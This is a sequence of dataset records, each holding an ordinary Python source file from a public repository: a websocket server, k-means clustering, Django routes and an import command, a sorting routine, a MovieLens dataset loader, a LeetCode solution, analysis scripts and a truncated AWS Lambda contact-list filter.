\"{}\".'.format(self.config[\"name\"]))\n\n if self.config['builder'] == Constants.CUSTOM and not self.config['build']:\n raise ClickableException(\n 'When using the \"custom\" builder you must specify a \"build\" in one the lib configs')\n\n if self.is_custom_docker_image:\n if self.dependencies_host or self.dependencies_target or self.dependencies_ppa:\n logger.warning(\n \"Dependencies are ignored when using a custom docker image!\")\n if self.image_setup:\n logger.warning(\n \"Docker image setup is ignored when using a custom docker image!\")\n\n def set_host_arch(self):\n host = platform.machine()\n self.host_arch = Constants.host_arch_mapping.get(host, None)\n\n if not self.host_arch:\n raise ClickableException(\"No support for host architecture {}\".format(host))\n\n def needs_clickable_image(self):\n return not self.container_mode and not self.is_custom_docker_image\n\n def needs_docker(self):\n return not self.container_mode\n","repo_name":"bhdouglass/clickable","sub_path":"clickable/config/libconfig.py","file_name":"libconfig.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"8717620968","text":"import asyncio\nfrom aiohttp import web\nimport aiohttp\nimport aiohttp_jinja2\nimport jinja2\nimport json\nimport logging\nimport os\n\nimport default_form_data\nimport state\n\nlogger = logging.getLogger('websockets')\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(logging.StreamHandler())\n\nconnected_websockets = set()\n\nasync def socket_handler(request):\n logger.info(\"New client connected\")\n\n ws = web.WebSocketResponse()\n #ws = web.WebSocketResponse(heartbeat=5.0)\n await ws.prepare(request)\n\n # Register\n connected_websockets.add(ws)\n\n # Send initial state (for page load, there's also site_handler passing this info, but\n # this is meant to cover for client reconnects)\n await ws.send_str(state.Machine().state_string())\n\n async for msg in ws:\n if msg.type == aiohttp.WSMsgType.TEXT:\n try:\n message = msg.data.strip()\n logger.info(\"Receiving message: \" + message)\n if message == '__ping__':\n # answer ping\n answer = message\n else:\n # convert json string to dict and pass along to state machine\n answer = state.Machine().on_event(json.loads(message))\n # on_event() can use send_message() to send messages to all clients,\n # but if a reply is made to the sending client only, the answer is used\n if answer:\n await ws.send_str(answer)\n logger.info(\"Answered message: \" + answer)\n except KeyError as e:\n logger.error(\"Message parsing error: \", exc_info=e)\n # Ignoring message\n except json.decoder.JSONDecodeError as e:\n logger.error(\"Message is not valid json: \", exc_info=e)\n # Ignoring message\n\n elif msg.type == aiohttp.WSMsgType.ERROR:\n logger.error('Socket connection closed with exception %s' % ws.exception())\n break\n\n elif msg.type == aiohttp.WSMsgType.CLOSED:\n logger.info('Socket connection closed')\n break\n\n else:\n logger.error(\"Unknown websocket message type\")\n break\n\n # Unregister\n logger.info(\"Client has disconnected\")\n connected_websockets.remove(ws)\n\n return ws\n\nasync def site_handler(request):\n context = {\n 'state': state.Machine().state_string()\n }\n context.update(default_form_data.defaults)\n response = aiohttp_jinja2.render_template(\"rpb_console.html\", request, context=context)\n return response\n\nasync def start_server_async():\n \"\"\"Start the server.\"\"\"\n logger.info(\"Starting server as a task\")\n app = web.Application()\n aiohttp_jinja2.setup(\n app, loader=jinja2.FileSystemLoader(os.getcwd())\n )\n app.add_routes([web.get('/socket.io', socket_handler)])\n app.add_routes([web.get('/', site_handler)])\n app.router.add_static('/js/', path='js', name='js')\n app.router.add_static('/img/', path='img', name='img')\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, 'localhost', 8080)\n await site.start()\n logger.info(\"Starting server as a task [ok]\")\n\n\nasync def send_message(message):\n global connected_websockets\n\n logger.info(f\"Going to send message '{message}' to all connected clients\")\n\n for ws in connected_websockets:\n logger.info(f\"Sending message...\")\n try:\n await ws.send_str(message)\n except ConnectionResetError as e:\n logger.error(f\"Socket closed: '{e}'\")\n\n","repo_name":"vicmortelmans/raspberry-pi-broadcaster","sub_path":"ws_server.py","file_name":"ws_server.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42183980823","text":"import csv\nimport math\nimport random\nimport matplotlib.pyplot as plot\n\n\nclass Program:\n\n def __init__(self):\n self._real_points = {}\n self._predicted_points = {}\n\n self._centroids = []\n self._min1 = 9999999999999999.99\n self._min2 = 9999999999999999.99\n self._max1 = -9999999999999999.99\n self._max2 = -9999999999999999.99\n\n self._counts_real = {'A': 0, 'B': 0, 'C': 0, 'D': 0}\n self._counts_predicted = [0 for _ in range(4)]\n\n self._label_to_index = {'A': None, 'B': None, 'C': None, 'D': None}\n self._index_to_label = [None for _ in range(4)]\n\n self.read_points()\n self._initialize_centroids()\n\n @staticmethod\n def euclidian_distance(p1, p2):\n return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n def _initialize_centroids(self):\n # We \"created\" a minimal rectangle and not the initial centroids will be taken randomly from its inside\n for _ in range(4):\n self._centroids.append((random.uniform(self._min1, self._max1), random.uniform(self._min2, self._max2)))\n\n def read_points(self):\n with open('dataset.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n\n self._counts_real[row[0]] += 1\n\n # We are going to keep for each point the real cluster label, so basically we are going\n # to keep for every point (A, B, C or D)\n self._real_points[(float(row[1]), float(row[2]))] = row[0]\n\n # We are going to predict for each point a centroid index, so basically we are going\n # to keep into a dictionary, for every point (0, 1, 2 or 3)\n\n self._predicted_points[(float(row[1]), float(row[2]))] = None\n\n # Here we compute the coordinates in order to create the minimal rectangle\n self._min1 = min([self._min1, float(row[1])])\n self._min2 = min([self._min2, float(row[2])])\n self._max1 = max([self._max1, float(row[1])])\n self._max2 = max([self._max2, float(row[2])])\n\n def iterate(self):\n\n # For every real point, we are going to compute which centroid is closer to it\n for p in self._predicted_points:\n\n minimum_index = None\n minimum_distance = 9999999999999999.99\n\n for i in range(4):\n\n distance = Program.euclidian_distance(p, self._centroids[i])\n\n if distance < minimum_distance:\n minimum_distance = distance\n minimum_index = i\n\n # For each point we will store the index of the nearest centroid\n self._predicted_points[p] = minimum_index\n\n # We compute how many points are closest to each centroid\n self._counts_predicted = [0 for _ in range(4)]\n\n # We are going to sum up all the coordinates of the nearest points to each centroid in\n # Order to be able to the mean later on\n sums = [[0, 0] for _ in range(4)]\n\n for p in self._predicted_points:\n self._counts_predicted[self._predicted_points[p]] += 1\n sums[self._predicted_points[p]][0] += p[0]\n sums[self._predicted_points[p]][1] += p[1]\n\n # Now, the new centroids will be computer as the \"mean\" of all the nearest points to it\n for i in range(4):\n self._centroids[i] = (\n round(sums[i][0] / self._counts_predicted[i], 20), round(sums[i][1] / self._counts_predicted[i], 20))\n\n def _run(self, iteration_count):\n for _ in range(iteration_count):\n self.iterate()\n\n def _plot_all(self):\n colors = {0: \"pink\", 1: \"blue\", 2: \"purple\", 3: \"orange\"}\n\n for p in self._predicted_points:\n plot.scatter(p[0], p[1], color=colors[self._predicted_points[p]], marker=\".\", s=3)\n\n for index in range(4):\n plot.scatter(self._centroids[index][0], self._centroids[index][1], color=colors[index], marker=\"X\", s=50)\n\n plot.show()\n\n def map_indexes_to_labels(self):\n\n matches = {}\n # This dictionary is going to hold how many label-index associations were made in total\n # there exists in total, 16 distinct possible associations, but we will only take the top 4\n # which are the most frequent ones.\n # Those will represent the most appropriate label-index mapping\n\n for l in self._label_to_index.keys():\n for i in range(4):\n matches[(l, i)] = 0\n\n for p in self._real_points.keys():\n # For each point, we take the index of the closest predicted centroid to it\n # and the real cluster label for each\n\n label = self._real_points[p]\n index = self._predicted_points[p]\n\n # For the associated label and index, we compute how many times those two\n # were associated\n matches[(label, index)] += 1\n\n matches_pairs = []\n for k, v in matches.items():\n matches_pairs.append((k, v))\n\n matches_pairs.sort(key=lambda v: v[1], reverse=True)\n\n # So basically, after the association is done, we take the pairs ((label, index), count) and order them by\n # the count\n\n results = matches_pairs[:4]\n\n # Now, the top 4 ones, are closest to being the correct values, or at least they are very very close\n\n for p in results:\n self._label_to_index[p[0][0]] = p[0][1]\n self._index_to_label[p[0][1]] = p[0][0]\n\n # We'll organize the guesses and the real labels in a matrix, using the label-index mapping we've made.\n def _compute_guess_matrix(self):\n\n self._guesses_matrix = [[0 for _ in range(4)] for _ in range(4)]\n\n for point in self._real_points.keys():\n true_index = self._label_to_index[self._real_points[point]]\n predicted_index = self._predicted_points[point]\n self._guesses_matrix[predicted_index][true_index] += 1\n\n def _compute_for_label_measurement(self, label_index):\n \"\"\"\n for each label, i = label's index:\n true positives = m[i][i]\n true negatives = sum(m[j][k]), j, k != i -> the matrix without the current line and column\n false positives = sum(m[i][j]), j != i -> just the current row (without position [i][i])\n false negatives = sum(m[j][i]), j != i -> just the current column (without position [i][i])\n \"\"\"\n # TP = no. of correct guesses that a certain point belongs to the current label\n true_positive = self._guesses_matrix[label_index][label_index]\n\n true_negative, false_positive, false_negative = 0, 0, 0\n\n for i in range(4):\n\n for j in range(4):\n\n if i != label_index and j != label_index:\n # TN = Guesses that have nothing to do with the current label.\n true_negative += self._guesses_matrix[i][j]\n elif i == label_index and j != label_index:\n # FP = Points that were wrongly guessed as being part of the current label.\n false_positive += self._guesses_matrix[i][j]\n elif i != label_index and j == label_index:\n # FN = Points that should've been guessed as being part of the current label.\n false_negative += self._guesses_matrix[i][j]\n\n return [true_positive, true_negative, false_positive, false_negative]\n\n def execute(self):\n\n self._run(200)\n self.map_indexes_to_labels()\n\n print(self._label_to_index)\n\n self._compute_guess_matrix()\n\n print(self._guesses_matrix)\n\n TP = 0\n TN = 0\n FP = 0\n FN = 0\n\n for index in range(4):\n ms = self._compute_for_label_measurement(index)\n print(ms)\n TP += ms[0]\n TN += ms[1]\n FP += ms[2]\n FN += ms[3]\n\n ATP = TP / 4\n ATN = TN / 4\n AFP = FP / 4\n AFN = FN / 4\n\n accuracy = (ATP + ATN) / (ATP + ATN + AFP + AFN)\n precision = ATP / (ATP + AFP)\n rappel = ATP / (ATP + AFN)\n score = 2 * precision * rappel / (precision + rappel)\n\n print(\"Avg. accuracy: \" + str(accuracy * 100) + \"%\")\n print(\"Avg. precision: \" + str(precision * 100) + \"%\")\n print(\"Avg. rappel: \" + str(rappel * 100) + \"%\")\n print(\"Avg. score: \" + str(score * 100) + \"%\")\n\n self._plot_all()\n","repo_name":"AlexandraBledea/Sem4-AI","sub_path":"Assignments/Lab7/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":8543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27595059035","text":"from django.urls import re_path as url\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.urls import path\n\n\nurlpatterns=[\n path('',views.index,name = 'index'),\n path('contacts',views.contacts, name = 'contacts'),\n url('signup', views.signup, name='signup'),\n path('login', LoginView.as_view(), name='login_url'),\n path('user/', views.profile, name='profile'),\n path('user/edit_profile/', views.edit_profile, name='edit_profile'),\n path('logout/', LogoutView.as_view(next_page='login_url'), name='logout_url'),\n path('accounts/profile/', views.profile, name='profile'),\n path('post',views.add_post,name='post'),\n path('search/', views.search_business, name='search'),\n path('business',views.business,name = 'business'),\n \n # path('edit_profile/',views.edit_profile, name='edit_profile'),\n # url(r'^api/business/$', views.BusinessList.as_view()),\n # url(r'^edit_profile/(?P\\w{0,50})',views.edit_profile, name='edit_profile'),\n]\nif settings.DEBUG:\n urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n","repo_name":"maureen-james/my_neighbourhood","sub_path":"neighbourhood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8267863641","text":"import random\nfrom time import time\nk =0 # comparisons\ndef shellSort(alist):\n size = len(alist)\n start =time()\n \n sublistCount = len(alist) // 2\n while sublistCount > 0:\n for startPosition in range(sublistCount):\n gapInsertionSort(alist, startPosition, sublistCount)\n sublistCount = sublistCount // 2\n end = time()\n print(size,\" items sorted in \", (end- start),\" seconds\",k,\" comparisons were made\")\n\ndef gapInsertionSort(alist, start, gap):\n for i in range(start + gap, len(alist), gap):\n currentValue = alist[i]\n position = i\n global k\n while position >= gap and \\\n alist[position - gap].getDate() > currentValue.getDate():\n k +=1\n alist[position] = alist[position - gap]\n position = position - gap\n alist[position] = currentValue\n\ndef printList(alist):\n count = 0\n for x in range(len(alist)):\n \n if count % 10 == 0:\n print()\n print(\"%10d\" % alist[x].getDate(),alist[x].getMaxTemp(),alist[x].getMinTemp(), end = \" \")\n count += 1\n \n\n\n","repo_name":"halmasha/sortmethods-evaluation","sub_path":"shellSort.py","file_name":"shellSort.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14065472596","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.LocationAPIView.as_view()),\n path('products//', views.LocationAPIView.as_view()),\n path('/department/', views.DepartmentAPIView.as_view()),\n path('/department//category/', views.CategoryAPIView.as_view()),\n path('/department//category//subcategory/', views.SubCategoryAPIView.as_view()),\n path('/department//category//subcategory//', views.SubCategoryAPIView.as_view()),\n path('skudata/', views.SKUDataAPIView.as_view()),\n]\n","repo_name":"nsanand/inmar-assignment","sub_path":"inmar/location/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29491821069","text":"from django.core.management.base import BaseCommand\nfrom ...models import Movie, Genre, Director, Actor, Writer\nimport csv\n\nclass Command(BaseCommand):\n help = 'Import movie dataset from csv'\n\n def handle(self, *args, **kwargs):\n with open('rotten_tomatoes_movies.csv', 'r', encoding='utf-8') as f:\n reader = csv.reader(f)\n\n first_row = True\n for row in reader:\n\n # skip headers\n if first_row:\n first_row = False\n continue\n\n data = {\n 'id': row[0],\n 'title': row[1],\n 'plot': row[2],\n 'rating': row[4],\n 'genre': row[5],\n 'directors': row[6],\n 'writers': row[7],\n 'actors': row[8],\n 'release_date': row[9],\n 'runtime': row[11]\n }\n\n # clean data to prevent db errors\n for key, value in data.items():\n if not value:\n data[key] = None\n\n movie, created = Movie.objects.get_or_create(\n title=data['title'],\n plot=data['plot'],\n rating=data['rating'],\n release_date=data['release_date'],\n runtime=data['runtime']\n ) \n \n if data['id']:\n movie.rotten_tomato_id = data['id']\n\n if data['genre']:\n genres = [x.strip() for x in data['genre'].split(',')]\n for genre in genres:\n genre_obj, created = Genre.objects.get_or_create(genre=genre)\n movie.genres.add(genre_obj)\n genre_obj.save()\n\n if data['directors']:\n directors = [x.strip() for x in data['directors'].split(',')]\n for director in directors:\n director_obj, created = Director.objects.get_or_create(name=director)\n movie.directors.add(director_obj)\n director_obj.save()\n\n if data['actors']:\n actors = [x.strip() for x in data['actors'].split(',')]\n for actor in actors:\n actor_obj, created = Actor.objects.get_or_create(name=actor)\n movie.actors.add(actor_obj)\n actor_obj.save()\n\n if data['writers']:\n writers = [x.strip() for x in data['writers'].split(',')]\n for writer in writers:\n writer_obj, created = Writer.objects.get_or_create(name=writer)\n movie.writers.add(writer_obj)\n writer_obj.save()\n\n movie.save()\n","repo_name":"nbrix/my-critic","sub_path":"movies/management/commands/import_movie_dataset.py","file_name":"import_movie_dataset.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16966271940","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 17 14:32:02 2019\n\n@author: raphael\n\"\"\"\nimport csv\nfrom scipy.stats import linregress\nimport numpy as np\n\n\nwith open('../Data/commenters.csv', 'r') as to_read:\n csvr = csv.reader(to_read)\n header = next(csvr)\n for line in csvr:\n community, snapshot, commenter_count = (int(x) for x in line)\n if not community in metrics_per_com:\n continue\n if not 'nb_commenters' in metrics_per_com[community]: \n metrics_per_com[community]['nb_commenters'] = []\n metrics_per_com[community]['nb_commenters'].append((snapshot, commenter_count))\n\nclass indicators(object):\n \n def slope(self):\n slope_per_com = {} \n mean_per_com = {} \n lifetime_per_com = {} \n for com in metrics_per_com:\n slope_per_com[com] = {}\n mean_per_com[com] = {}\n for indic in metrics_per_com[com]:\n these_indics = metrics_per_com[com][indic]\n x = [x[0] for x in these_indics]\n y = [x[1] for x in these_indics]\n slope, intercept, r_value, p_value, std_err = linregress(x, y)\n slope_per_com[com][indic] = slope\n mean_per_com[com][indic] = np.mean(y)\n lifetime_per_com[com] = len(metrics_per_com[com]['nb_members'])\n\nnb_snapshot_per_community = {}\nsemantic_metrics = {}\nwith open('../Results/semantic_metrics.csv', 'r') as to_read:\n csvr = csv.reader(to_read)\n header = next(csvr)\n for line in csvr:\n community = int(line[0])\n snapshot = int(line[1])\n gini = float(line[-1])\n if not community in nb_snapshot_per_community:\n nb_snapshot_per_community[community] = 0\n semantic_metrics[community] = {}\n nb_snapshot_per_community[community] += 1\n semantic_metrics[community][snapshot] = {'gini' : float(gini)}\n \nsankey_metrics = {}\nwith open('../Results/sankey_metrics.csv', 'r') as to_read:\n csvr = csv.reader(to_read)\n header = next(csvr)\n for line in csvr:\n community = int(line[0])\n snapshot = int(line[1])\n if not nb_snapshot_per_community.get(community, 0) > 1:\n continue\n if not community in sankey_metrics:\n sankey_metrics[community] = {snapshot : {}}\n if not snapshot in sankey_metrics[community]:\n sankey_metrics[community][snapshot] = {}\n for i in range(2, len(line)):\n sankey_metrics[community][snapshot][header[i]] = int(line[i])\n \nlist_indics = ['d_in', 'd_out', 'nb_members']\nmetrics_per_com = {} \nfor com in sankey_metrics:\n metrics_per_com[com] = {}\n for indic in list_indics:\n metrics_per_com[com][indic] = []\n for snapshot in sankey_metrics[com]:\n metrics_per_com[com][indic].append((snapshot, sankey_metrics[com][snapshot][indic]))\n metrics_per_com[com]['gini'] = []\n for snapshot in semantic_metrics[com]:\n metrics_per_com[com]['gini'].append((snapshot, semantic_metrics[com][snapshot]['gini']))\n \nfor snapshot in range(6): \n list_edges = [] \n nodes_per_com = {}\n degree_per_vertex = {}\n out_per_vertex = {}\n with open('../Data/edgelists_2019-04-18_102000/edgelist_%s.csv' % snapshot, 'r') as to_read:\n csvr = csv.reader(to_read)\n next(csvr)\n for line in csvr:\n s, v1, v2, com1, com2, ltype = line\n if v1 == v2:\n continue\n if (v1,v2) in list_edges or (v2, v1) in list_edges:\n continue\n list_edges.append((v1,v2))\n com1 = int(com1)\n if not com1 in metrics_per_com:\n continue\n if not com1 in nodes_per_com:\n nodes_per_com[com1] = set()\n if not v1 in degree_per_vertex:\n degree_per_vertex[v1] = 0\n degree_per_vertex[v1] += 1\n if not v1 in out_per_vertex:\n out_per_vertex[v1] = 0\n if ltype == 'out':\n out_per_vertex[v1] += 1\n nodes_per_com[com1].add(v1)\n \n for community in nodes_per_com: \n nodes_per_com[community] = list(nodes_per_com[community])\n if not 'odf' in metrics_per_com[community]:\n metrics_per_com[community]['odf'] = []\n \n list_odf = []\n for v in nodes_per_com[community]:\n list_odf.append(out_per_vertex[v] / float(degree_per_vertex[v]))\n metrics_per_com[community]['odf'].append((snapshot, np.mean(list_odf)))\n \n \n\n \n \n\nlist_indics = list_indics + ['gini', 'odf', 'nb_commenters'] \nwith open('../Results/metrics_per_community.csv', 'w') as to_write:\n csvw = csv.writer(to_write)\n csvw.writerow(['community'] + ['slope_%s' % indic for indic in list_indics] + ['mean_%s' % indic for indic in list_indics] + ['lifetime'])\n for com in metrics_per_com:\n if not 'nb_commenters' in metrics_per_com[com]:\n continue\n csvw.writerow(\n [com] \n + [slope_per_com[com][indic] for indic in list_indics] \n + [mean_per_com[com][indic] for indic in list_indics] \n + [lifetime_per_com[com]]\n )\n\n","repo_name":"rcharbey/Sankey_analysis","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43288580900","text":"import torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\nimport os\nimport numpy as np\nimport scipy.sparse as sparse\nimport copy\nimport random\n\nclass MovieLensDataset(Dataset):\n def __init__(self, ratings_file=None, movies_file=None, transform=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.movie_dict = {}\n self.dataframe = MovieLensDataset.get_dataframe(ratings_file, movie_dict=self.movie_dict)\n self.movies_dataframe = MovieLensDataset.get_movies_dataframe(movies_file)\n self.matrix = self.get_matrix()\n self.user_count = self.matrix.shape[0]\n self.item_count = self.matrix.shape[1]\n self.transform = transform\n\n def __len__(self):\n return self.user_count\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n sample = self.matrix[idx]\n sample = torch.tensor(sample.toarray()).float().squeeze()\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample, idx\n\n @staticmethod\n def get_movies_dataframe(csv_file=None):\n if not os.path.isfile(csv_file):\n raise FileNotFoundError(\"csv file not found\")\n\n df = pd.read_csv(csv_file)\n return df\n\n @staticmethod\n def get_dataframe(csv_file, movie_dict=None):\n if not os.path.isfile(csv_file):\n raise FileNotFoundError(\"csv file not found\")\n\n df = pd.read_csv(csv_file)\n df.drop(\"rating\", 1, inplace=True)\n df.drop(\"timestamp\", 1, inplace=True)\n df[\"movieId\"] = MovieLensDataset.remove_gaps(df[\"movieId\"], movie_dict=movie_dict)\n\n def minusOne(x):\n return x - 1\n\n df[\"userId\"] = df[\"userId\"].apply(minusOne)\n df[\"movieId\"] = df[\"movieId\"].apply(minusOne)\n\n return df\n\n @staticmethod\n def remove_gaps(pd_series, movie_dict=None, flip=True):\n real_count = len(pd_series.unique())\n\n for i in range(1, real_count + 1):\n movie_dict[i-1] = pd_series.max()\n pd_series.replace(pd_series.max(), i*(-1), inplace=True)\n\n def positify(x):\n return x * (-1)\n\n pd_series = pd_series.apply(positify)\n\n if flip:\n pd_series = pd_series * (-1) + max(pd_series) + 1\n\n dict_max = max(list(movie_dict.values()))\n for key in movie_dict:\n val = movie_dict[key]\n new_val = (val * (-1)) + dict_max + 1\n movie_dict[key] = new_val\n\n return pd_series\n\n def get_matrix(self):\n item_count = self.dataframe[\"movieId\"].max()\n user_count = self.dataframe[\"userId\"].max()\n\n row = self.dataframe[\"userId\"]\n col = self.dataframe[\"movieId\"]\n data = np.ones((len(self.dataframe)))\n\n return sparse.csr_matrix((data, (row, col)), shape=(user_count + 1, item_count + 1))\n\n def get_movie(self, index):\n real_id = self.movie_dict[index]\n row = self.movies_dataframe[self.movies_dataframe[\"movieId\"] == real_id]\n title = row[\"title\"].values[0]\n genres = row[\"genres\"].values[0]\n\n ret = f\"#{real_id}: {title} ===> {genres}\"\n\n return ret\n\n def get_movie_list_str(self, indexes=None):\n l = []\n\n for i in indexes:\n l.append(self.get_movie(i))\n\n return \"\\n\".join(l)\n\n def split_train_test(self, test_size=0.2):\n train_matrix = self.matrix.copy()\n nz = train_matrix.nonzero()\n nz = list(zip(*[x.tolist() for x in nz]))\n test = random.sample(nz, round(len(nz) * test_size))\n test = tuple(np.array(x) for x in zip(*test))\n test_matrix = sparse.csr_matrix(train_matrix.shape)\n test_matrix[test] = 1\n train_matrix[test] = 0\n\n train = copy.deepcopy(self)\n train.matrix = train_matrix\n\n test = copy.deepcopy(self)\n test.matrix = test_matrix\n\n return train, test\n\n\n\nif __name__ == \"__main__\":\n ds = MovieLensDataset(ratings_file=\"movielens/ml-100k/ratings.csv\", movies_file=\"movielens/ml-100k/movies.csv\")\n print(ds[0][0])\n","repo_name":"yoru22413/gan-recommander","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41249778793","text":"#\n# 708. Insert into a Sorted Circular Linked List\n#\n# Q: https://leetcode.com/problems/insert-into-a-sorted-circular-linked-list/\n# A: https://leetcode.com/problems/insert-into-a-sorted-circular-linked-list/discuss/859467/Javascript-Python3-C%2B%2B-Simple-solutions\n#\n\nclass Node:\n def __init__(self, val = None, next = None):\n self.val = val\n self.next = next\n\nclass Solution:\n def insert(self, head: 'Node', x: int) -> 'Node':\n alt = Node(x); alt.next = alt\n if not head:\n return alt\n big = head\n pre = head\n cur = head.next\n ok = lambda x: pre.val <= x <= cur.val\n while not ok(x) and cur != head:\n if big.val <= cur.val:\n big = cur\n pre = pre.next\n cur = cur.next\n if not ok(x):\n pre = big\n cur = big.next\n alt.next = cur\n pre.next = alt\n return head\n","repo_name":"claytonjwong/leetcode-py","sub_path":"708_insert_sorted_circular_linked_list.py","file_name":"708_insert_sorted_circular_linked_list.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72727724890","text":"import numpy as np\nfrom scipy.constants import c, h, k, e\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import UnivariateSpline\n\n\ndebug = True # do stuff that is useful\n#bounds = [900, 1080] # domain of first pulse\n#dx = 0.0762 # separation of measurement locations\n#res = 1000 # resolution of interpolation\n#smooth = 0.0001 # degree of smoothing\n\n\n#-----------------------------------------------------------------------------\n\nif debug:\n import matplotlib.pyplot as plt\n\n# Directory structure and transition indices\ndirectories = [\"1.0 Torr\", \"4.0 Torr\", \"8.0 Torr (D)\", \"8.0 Torr (M)\",\n \"8.0 Torr (U)\"]\ntransitions = [11, 18, 23, 29, 16, 20, 26, 19, 24]\n\nfor d in directories:\n # load simulation data\n prefix = \"\".join((d[0], \"torr\"))\n try:\n emissions = np.loadtxt(\"/\".join((d, prefix)) + \"_emissions.csv\",\n delimiter=\",\")\n except IOError:\n continue\n times = np.loadtxt(\"/\".join((d, prefix)) + \"_times.csv\", delimiter=\",\")\n \n # initialize arrays\n n = len(times)\n spectra = np.zeros((n, len(transitions)))\n temperatures = np.zeros(n)\n variance = np.zeros(n)\n\n # eliminate unnecessary data\n for i in range(len(transitions)):\n spectra[:, i] = emissions[:, transitions[i]]\n\n wavelengths = np.loadtxt(\"/\".join((d, prefix)) + \"_wavelengths.csv\",\n delimiter=\",\")\n wavelengths = np.array([wavelengths[i] for i in transitions]) * 1e9\n header = [str(int(i)) for i in wavelengths]\n\n with open(\"/\".join((d, \"spectra.csv\")), mode=\"w\") as f:\n f.write(\",\".join(header) + \"\\n\")\n np.savetxt(f, spectra, delimiter=\",\")\n","repo_name":"l3enny/dissertation","sub_path":"simulations/Global/No Trapping/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"21084874362","text":"import json\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom datetime import date\nfrom datetime import datetime\n\nbucket = 'pinpoint-contact-list'\nkey = 'contact_list.json'\ndynamoTable = 'pinpoint_info'\n\nclient = boto3.client('s3')\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table(dynamoTable)\n\ndef verifydate(user, userDb, actfecha,now):\n \n print(userDb)\n flag = False #Flag for validations\n listsize = len(userDb['sent']) - 1\n counter = userDb['counter']\n dateLS = datetime.strptime(userDb['sent'][listsize]['date'], '%d/%m/%y %H:%M') \n diffdays = now - dateLS #Diff Between last email sent and today \n if counter < 4:\n if actfecha < dateLS and diffdays.days >= 2 :\n flag = True\n if actfecha > dateLS:\n diffdays1 = now - actfecha\n if diffdays1.days >= 2:\n updete_db = client.update_item(\n TableName = dynamoTable,\n Key = {\n 'email': {\n 'S': email\n }\n },\n UpdateExpression=\"SET #counter = :vals\",\n ExpressionAttributeNames={\"#counter\": \"counter\"},\n ExpressionAttributeValues={\":vals\": { \"N\" : \"0\" }})\n flag = True\n #Resetear contador o hacer lo que se vaya a hacer\n return flag\n \n \n\ndef lambda_handler(event, context):\n # Variables para llenar\n finalList = []\n listofemail=[]\n \n #Cliente boto3\n \n \n #Fecha de hoy\n now = datetime.now()\n today = now.strftime(\"%d/%m/%y %H:%H\")\n \n #tabla Dynamo\n \n \n # Get Object S3\n result = client.get_object(Bucket=bucket, Key=key)\n text = result[\"Body\"].read().decode()\n jsonlist = json.loads(text)\n listofusers= jsonlist['listofusers'] # Cambiar a este para dejar de probar con el event\n #listofusers = event['listofusers']\n \n \n \n resp = table.scan()\n listofuserDynamoDb = resp['Items']\n \n \n for user in listofuserDynamoDb:\n listofemail.append(user['email'])\n \n \n print('--------------------event users--------------------------------')\n print(listofusers)\n print('--------------------------Dynamo Users-------------------------')\n print(listofuserDynamoDb)\n print(\"-------------------------final users-----------------------------------------------\")\n \n \n\n for user in listofusers:\n actfecha = datetime.strptime(user['Attributes.LastActionTime'], '%d/%m/%y %H:%M')\n diff = now - actfecha\n if not user['Address'] in listofemail:\n if diff.days >= 7:\n finalList.append(user)\n else:\n for userDb in listofuserDynamoDb:\n if userDb['email'] == user['Address']:\n if verifydate(user,userDb,actfecha,now):\n finalList.append(user)\n break\n \n \n for usuario in finalList:\n if usuario['Attributes.Name'] == \" \":\n usuario['Attributes.Name'] = \"USUARIO\"\n \n fLOU = {\n 'listofusers': finalList\n }\n with open('/tmp/sample.txt', 'w') as f:\n json.dump(fLOU, f)\n s3_client = boto3.client('s3')\n response = s3_client.upload_file('/tmp/sample.txt', 'pinpoint-contact-list', 'filtered_contact_list.json')\n \n return {\n 'statusCode': 200,\n 